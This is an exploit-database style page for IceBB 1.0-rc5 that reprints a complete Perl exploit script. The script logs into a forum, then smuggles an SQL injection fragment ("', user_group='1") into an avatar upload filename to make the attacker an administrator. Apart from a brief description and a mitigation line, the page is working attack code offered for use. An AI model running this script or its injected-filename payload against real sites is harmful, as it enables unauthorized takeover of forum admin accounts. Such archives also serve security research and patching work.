header-logo
Suggest Exploit
vendor:
IceBB
by:
Hessam-x
7.5
CVSS
HIGH
Remote Code Execution
Unknown
CWE
Product Name: IceBB
Affected Version From: IceBB version 1.0-rc5
Affected Version To: IceBB version 1.0-rc5
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

IceBB 1.0-rc5 Remote Create Admin Exploit

This exploit allows an attacker to create an admin account in IceBB version 1.0-rc5. The attacker needs to register a user and then run the exploit with the provided host, username, and password. Once successful, the attacker can login with admin access. The vulnerability is related to the magic_quotes_gpc setting being turned off.

Mitigation:

Enable magic_quotes_gpc setting to prevent this exploit.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#  IceBB 1.0-rc5 Remote Create Admin Exploit
#  1. register a user
#  2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass]
#  3. login with admin access :)
# - magic_quotes_gpc = Off
#
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use LWP::UserAgent;
use HTTP::Cookies;

$port = "80";
 $host = $ARGV[0];
 $uname = $ARGV[1];
 $passwd = $ARGV[2];
 $url = "http://".$host;

 print q(
 ###########################################################
 #        IceBB 1.0-rc5 Remote Create Admin Exploit        #
 #                    www.Hessamx.Net                      #
 ################# (C)oded By Hessam-x #####################

);


 if (@ARGV < 3) {
 print " #  usage : xpl.pl [host&path] [uname] [pass]\n";
 print " #  e.g : xpl.pl www.milw0rm.com/icebb/ str0ke 123456\n";
 exit();
 }

   print " [~] User/Password : $uname/$passwd \n";
   print " [~] Host : $host \n";

 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();

 $xpl->cookie_jar( $cookie_jar );


$login = $xpl->post($url.'index.php',
Content => [
 'act' => 'login',
'from' => 'index.php',
'user' => $uname,
'pass' => $passwd,
'func' => 'Login',
],);

 if($cookie_jar->as_string =~ /icebb_sessid=(.*?);/) {
       $cookie = $1;
   print " [~] Logined ...\n";
 } else {
 print " [-] Can not Login In $host !\n";
 exit();
 }

 $badcode = "', user_group='1";
 $avat = $xpl->post($url.'index.php',Content_Type => 'form-data',
 Content => [
 'avtype'  => 'upload',
 'act' => 'ucp',
 'func' => 'avatar',
 'file'   => [
              undef,
              'avatar.jpg'.$badcode,
              Content_type => 'text/plain',
              Content => 'MYAVATAR',
             ],
 'submit'        => 'Save',
 ],
 );
 $test = $xpl->get($url.'index.php');
if($test->as_string =~ /Admin Control Center/) {
print " [+] You Are admin Now ! \n";
} else {
print " [-] Exploit Failed ! \n";
}
print "\n #################################################### \n";

# milw0rm.com [2007-03-26]